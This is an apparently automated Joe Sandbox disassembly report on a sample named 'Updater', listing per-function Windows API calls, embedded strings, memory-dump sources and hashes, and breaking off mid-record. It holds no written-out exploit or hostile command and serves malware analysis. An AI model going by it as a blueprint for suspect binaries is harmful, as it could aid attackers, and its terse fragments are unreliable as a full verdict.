                                                                                                  • _wcslen.LIBCMT ref: 0075CFF4
                                                                                                  • _wcslen.LIBCMT ref: 0075D06F
                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0075D0B2
                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0075D1C1
                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0075D24D
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0075D281
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0075D28E
                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0075D360
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                  • API String ID: 9721498-966354055
                                                                                                  • Opcode ID: 52afd73d506f453124bb7b5a05fef99f1960729a05d9176934a8f736d69a03fd
                                                                                                  • Instruction ID: 3acb172c22241db6312a49836c27e58501b716a4be1994875c3939020ee5c208
                                                                                                  • Opcode Fuzzy Hash: 52afd73d506f453124bb7b5a05fef99f1960729a05d9176934a8f736d69a03fd
                                                                                                  • Instruction Fuzzy Hash: 3A127A35604211EFCB24DF14C881A6AB7E6FF88714F04845DF94A9B3A2CB79ED45CB86
                                                                                                  APIs
                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00761398
                                                                                                  • _wcslen.LIBCMT ref: 007613CF
                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00761410
                                                                                                  • _wcslen.LIBCMT ref: 00761435
                                                                                                  • _wcslen.LIBCMT ref: 00761488
                                                                                                  • _wcslen.LIBCMT ref: 007614E2
                                                                                                    • Part of subcall function 006F014F: _wcslen.LIBCMT ref: 006F015A
                                                                                                    • Part of subcall function 00733A35: SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00733A67
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                  • API String ID: 1103490817-4258414348
                                                                                                  • Opcode ID: 4c52a0f7e77f770087d258a3245f5285d08d40419aecba9a5083a3fd64d6c57c
                                                                                                  • Instruction ID: 604ae357608127abf8466b3367b674eccd6c6ef35fa94614b4fc5b8b7bebeeb3
                                                                                                  • Opcode Fuzzy Hash: 4c52a0f7e77f770087d258a3245f5285d08d40419aecba9a5083a3fd64d6c57c
                                                                                                  • Instruction Fuzzy Hash: A5C1EF746043119FCB14EF24C444A6AB7E2AF95304F48846DFC579B3A2DB39EE46CB86
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                  • API String ID: 0-1645009161
                                                                                                  • Opcode ID: de01b41a4e54e2912d526643c6182db98812e1e84c83c6085722423955e7d7e0
                                                                                                  • Instruction ID: 16f70ecdd2241fdbae366ec4d0596be97a765dd60c4afa71f9a4ff0a139d0aff
                                                                                                  • Opcode Fuzzy Hash: de01b41a4e54e2912d526643c6182db98812e1e84c83c6085722423955e7d7e0
                                                                                                  • Instruction Fuzzy Hash: A4912A70641319FFEF10AF61DC42FAE37AAAF54340F048019F905AB192EBB8E955C7A5
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 00768D25
                                                                                                  • _wcslen.LIBCMT ref: 00768D39
                                                                                                  • _wcslen.LIBCMT ref: 00768D5C
                                                                                                  • _wcslen.LIBCMT ref: 00768D7F
                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00768DC1
                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00763FB0,?), ref: 00768E23
                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00768E5C
                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00768E9F
                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00768ED6
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00768EE2
                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00768EF2
                                                                                                  • DestroyIcon.USER32(?), ref: 00768F01
                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00768F1E
                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00768F2A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                  • API String ID: 799131459-1154884017
                                                                                                  • Opcode ID: 88997ce8253116a4fe1acfb09a3e138c09e8a4faa5a1e6a3aca5b93acd88eddf
                                                                                                  • Instruction ID: b8e64f0f15def7f1777aa9aa72f74f12d786a12b0573ed0d732380986c9e35d0
                                                                                                  • Opcode Fuzzy Hash: 88997ce8253116a4fe1acfb09a3e138c09e8a4faa5a1e6a3aca5b93acd88eddf
                                                                                                  • Instruction Fuzzy Hash: 5661D171A00219FAEB64CF64CC45BBE77A8BB08711F108209FD16D61D0DFB99E90CBA5
                                                                                                  APIs
                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00744B0A
                                                                                                  • _wcslen.LIBCMT ref: 00744B15
                                                                                                  • _wcslen.LIBCMT ref: 00744B5C
                                                                                                  • _wcslen.LIBCMT ref: 00744B93
                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00744BC7
                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00744C10
                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00744C4A
                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00744C7F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                  • API String ID: 1839972693-4113822522
                                                                                                  • Opcode ID: fa1c98dd106a0640809fb537bb4cb600994a5b1db4d4407effe8998de6468de2
                                                                                                  • Instruction ID: 8e2ec7acce2ee73028c42151b66d7506809cd8967373b7717b980aab6088bf62
                                                                                                  • Opcode Fuzzy Hash: fa1c98dd106a0640809fb537bb4cb600994a5b1db4d4407effe8998de6468de2
                                                                                                  • Instruction Fuzzy Hash: F461C372A043009FC714EF28D881B6AB3E1EF94714F14852DF856A7391EB75EE05CB86
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen
                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                  • API String ID: 176396367-909552448
                                                                                                  • Opcode ID: 35c6b35227ee30a555fcbc3946e081422d2745c0cd5e4c238ed07b679b0cf83b
                                                                                                  • Instruction ID: 5ecd885cb0da3843d58683034d0f660ffa12381b9108ea44cd1b9a5634c86b84
                                                                                                  • Opcode Fuzzy Hash: 35c6b35227ee30a555fcbc3946e081422d2745c0cd5e4c238ed07b679b0cf83b
                                                                                                  • Instruction Fuzzy Hash: AE510332E0019687CF70AF68E9011FB3311AB22749F50412DFC165B659FAB9EC6EC782
                                                                                                  APIs
                                                                                                  • LoadIconW.USER32(00000063), ref: 00736A0C
                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00736A1D
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00736A35
                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00736A4B
                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00736A51
                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00736A61
                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00736A67
                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00736A88
                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 00736AA1
                                                                                                  • GetWindowRect.USER32(?,?), ref: 00736AAA
                                                                                                  • _wcslen.LIBCMT ref: 00736B0A
                                                                                                  • GetDesktopWindow.USER32 ref: 00736B48
                                                                                                  • GetWindowRect.USER32(00000000), ref: 00736B4F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Item$MessageSendText$Rect$DesktopIconLoad_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2606896325-0
                                                                                                  • Opcode ID: e0d286aff5647efdf6c6d4a2042c7764b6e8b69f6929a613733f902239a021ca
                                                                                                  • Instruction ID: 7edea8c12d593b84da356ef469d9ecc80cb8e13e5592bca2c7454530eea05d6c
                                                                                                  • Opcode Fuzzy Hash: e0d286aff5647efdf6c6d4a2042c7764b6e8b69f6929a613733f902239a021ca
                                                                                                  • Instruction Fuzzy Hash: 19716E71A00709AFEB20DFA8CD45BAEBBF5FF44704F108518E546A61A1D779ED44CB14
                                                                                                  APIs
                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 007509F0
                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 007509FB
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00750A06
                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00750A11
                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00750A1C
                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00750A27
                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00750A32
                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00750A3D
                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00750A48
                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00750A53
                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00750A5E
                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00750A69
                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00750A74
                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00750A7F
                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00750A8A
                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00750A95
                                                                                                  • GetCursorInfo.USER32(?), ref: 00750AA5
                                                                                                  • GetLastError.KERNEL32 ref: 00750AE7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3215588206-0
                                                                                                  • Opcode ID: 09e39eecf1dd300004ca20ec2be9a24e1111d4385fa70d5df8462b8941d04796
                                                                                                  • Instruction ID: 90bce3c755956414ee8535da84677670712f73c8e479f196dd9984f353a75d70
                                                                                                  • Opcode Fuzzy Hash: 09e39eecf1dd300004ca20ec2be9a24e1111d4385fa70d5df8462b8941d04796
                                                                                                  • Instruction Fuzzy Hash: 084144B0E043196ADB10DFBA8CC9C5EBFE8FF04754B50852AE51DE7291DA789901CF91
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                  • API String ID: 2055661098-1000479233
                                                                                                  • Opcode ID: a5eda8781fc036583fc7f9f318e42635a05fc529d4941d018640608bf0487ced
                                                                                                  • Instruction ID: c94f782feedce524a9b0d78252b9c0e12b72efce976f6dcc8aa47c7063c3e8d8
                                                                                                  • Opcode Fuzzy Hash: a5eda8781fc036583fc7f9f318e42635a05fc529d4941d018640608bf0487ced
                                                                                                  • Instruction Fuzzy Hash: D2910572A082108FC714DF28C841B6AB7A1FF50708F14446EFC5A5B352EB75ED4ACB96
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 006F073A
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006F074B
                                                                                                  • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006F0761
                                                                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006F076F
                                                                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006F077D
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 006F07D3
                                                                                                  • ___scrt_fastfail.LIBCMT ref: 006F07E8
                                                                                                  • DeleteCriticalSection.KERNEL32(007A16CC,00000007), ref: 006F07F3
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 006F0803
                                                                                                  Strings
                                                                                                  • SleepConditionVariableCS, xrefs: 006F0767
                                                                                                  • kernel32.dll, xrefs: 006F0746
                                                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 006F0735
                                                                                                  • WakeAllConditionVariable, xrefs: 006F0775
                                                                                                  • InitializeConditionVariable, xrefs: 006F075B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleProc$Module$CloseCreateCriticalDeleteEventSection___scrt_fastfail
                                                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                  • API String ID: 2238755874-1714406822
                                                                                                  • Opcode ID: 832b3ae433c5c937c70c1cb5714570e1a52215c9b245336495257314310927f4
                                                                                                  • Instruction ID: e569883321eb1b2a8e63a4ccf82afbb42bf04854ef463fd66c854a31b48dd7b0
                                                                                                  • Opcode Fuzzy Hash: 832b3ae433c5c937c70c1cb5714570e1a52215c9b245336495257314310927f4
                                                                                                  • Instruction Fuzzy Hash: 732130B6F41315DBFB306BB55C09B7A26595B81B80F4AC124FD05D7391DEF89C008A94
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 014B4F97
                                                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 014B4FA8
                                                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 014B4FB8
                                                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 014B4FC8
                                                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 014B4FD8
                                                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 014B4FE8
                                                                                                  • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 014B4FF8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                  • API String ID: 667068680-2233174745
                                                                                                  • Opcode ID: be7369dcf5cdda972958a61dcfe44cdcce84782b37be27af76527758de608049
                                                                                                  • Instruction ID: 7b1fa1c8c8962805f9a728d5189cc817989dcb4e84799cc25a5e7627d0855c13
                                                                                                  • Opcode Fuzzy Hash: be7369dcf5cdda972958a61dcfe44cdcce84782b37be27af76527758de608049
                                                                                                  • Instruction Fuzzy Hash: A2F0ACEC6453026BA620BF725DC5C666A9CD638A04B72181F74015E135FBF486107774
                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00754CB9
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00754CCB
                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?), ref: 00754CF0
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00754D3C
                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00754DA6
                                                                                                  • SysFreeString.OLEAUT32(00000009), ref: 00754E60
                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00754EC6
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00754EF0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                  • API String ID: 354098117-199464113
                                                                                                  • Opcode ID: 870ee705abad6946ccd3a36047f71164df7289874838c2090506adf045f6dfec
                                                                                                  • Instruction ID: c7e4d36e0d9ef10aa0e06b118c8dca4c3d90fa06f451a16e118acd41c7cdf6a1
                                                                                                  • Opcode Fuzzy Hash: 870ee705abad6946ccd3a36047f71164df7289874838c2090506adf045f6dfec
                                                                                                  • Instruction Fuzzy Hash: 1B125071A00209EFDB14CF54C894EAEB7B5FF45319F248098E90A9B251D775EE86CBA0
                                                                                                  APIs
                                                                                                  • GetMenuItemCount.USER32 ref: 00727E4B
                                                                                                  • GetMenuItemCount.USER32 ref: 00727EFB
                                                                                                  • GetCursorPos.USER32(?), ref: 00727F3F
                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00727F48
                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,00000000,00000000,00000000,?,?,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 00727F5B
                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00727F67
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 36266755-4108050209
                                                                                                  • Opcode ID: 7fcc906f1cd2b65863b242a9672d1ad9a679e56bc0aac8b21e381da4019a8c10
                                                                                                  • Instruction ID: da48b9f056581cd4ceb4d10ca78b35bdb3473e100486db99a064c22cce0cf5c2
                                                                                                  • Opcode Fuzzy Hash: 7fcc906f1cd2b65863b242a9672d1ad9a679e56bc0aac8b21e381da4019a8c10
                                                                                                  • Instruction Fuzzy Hash: 507156B0A48325BFEB258F25DD49FAABF65FF05324F104206F515A62D1C7B96C10CBA4
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E438C: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006E5687,01433E38,?,?,?), ref: 006E43EF
                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006E490C
